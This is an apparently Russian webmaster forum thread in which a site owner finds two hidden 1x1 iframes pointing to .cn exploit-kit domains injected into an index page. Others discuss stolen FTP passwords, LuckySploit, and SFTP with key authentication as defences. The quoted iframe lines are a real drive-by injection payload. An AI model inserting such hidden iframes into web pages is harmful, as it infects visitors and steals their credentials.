Новая тема   Ответить

 arte
доделывал топ, надо было добавить кое что в индекс.схтмл, и случайным образом наткнулся на строчку в коде

<iframe src="http://lotante.cn/in.cgi?income38" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://thelotbet.cn/in.cgi?income40" width=1 height=1 style="visibility: hidden"></iframe>


вопос: откуда она там могла взяться? права вроде настроены так что индекс могу менять только я... если ктонить встречался с этим помогите плиз!

 Alexandur
Может пароль от ФТП свистнули. Сходи в венерологический.

 WASP
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.

 Yacc
LuckySploit

 rusawm
чекай свою систему локальную если на всех фтп аккаунтах так

 nosf
Тоже самое было. Трояном вытянули пароль к фтп видимо.
Добрые люди посоветовали авиру(http://www.free-av.com/) и всё стало впорядке, как после нода нашёл 35 вирусов
Подумываю перейти на платную версию авиры

 kit
Ставь SFTP и оставляй доступ только со своего IP.
И все проблемы исчезнут.

 nosf
а если айпи динамический?)

 Stup
WASP писал:

Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.

 lega_cobra
nosferatu писал:

Делай доступ по ключам, а не по логину/паролю. Ключ можешь в USB token засунуть в неэкспортируемом виде, тогда точно никто никогда не стырит...

 Yacc
Сплоит относительно новый и в паблике его нет. Пока. )
Так что господа сиджеводы - готовьтесь.

Заражение происходит при посещении инфицированных страницы. Если при этом в браузере разрешено выполнение JScript и у вас есть права администратора, то вы попали. Однозначно.
И никакие антивирусы вас не спасут, так как это не просто "вирус" (если быть точным, то это вообще не вирус), а набор скриптов, эксплуатирующих различные актуальные уязвимости. И полагать, что после того как антивирус отрапортовал об удалении "вируса", вы чисты - просто наивно.
А если антивирус даже не среагировал и вы продолжали работать, то чего уж тогда удивлятся, что у вас утянули пароли.
Никакие баны по IP, как вы понимаете - не помогут, так как шелы заливаются с вашей машины.

Здесь список известных на сегодня атакующих серверов:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Domain&…amp;page=0

Хочу ещё раз подчеркнуть, что ни один антивирус не сможет полностью удалить такую заразу, если вы работали под учётной записью администратора. А большинство из них даже не среагирует.

 Mad Knight
Yacc: Ебать страху то нагнал, я чуть винчь не отформатировал

 arte
Вчера почистил индекс, пока нормально, попозже посмотрим что будет.

На остальных доменах пока все спокойно...

 lega_cobra
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль?

 doomed

А что, кто-то еще использует ftp?

 mickey
на вебазилле все отфильтровано слава богу по дефолту

 Yacc
А что кто-то ещё не знает о существование приватных сборок фтп-грабберов стоимостью $5k?

 mickey
кинь пару ссылок народу почитать, я тоже приватную сборку жигулей видел за двацатник

 Teval
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь

ЗЫ: я не о тс

 mickey
нуда заранее себя документируют

 color
gimcnuk писал:
скорее через скрипты поломали

 dlk44
lega_cobra писал:

Нет.

 dlk44
Stup писал:

Это если на сервере так настроены виртуальные хосты что через PHP можно зайти в чужую папку. А если все НОРМАЛЬНО как нада настроено - то получив доступ к одному FTP только с файлами на этом FTP можно и орудовать.

 Woland
Цитата:

Оффтопик: Думаю "чё-то Teval молчит в аське на вопрос о трейде, с чего бы ... " а он, оказывается, посты перечитывает

 color
dlk44 писал:
почему нет? у нас процентов около 5 клиентов удалось перевести )) остальные не хотят )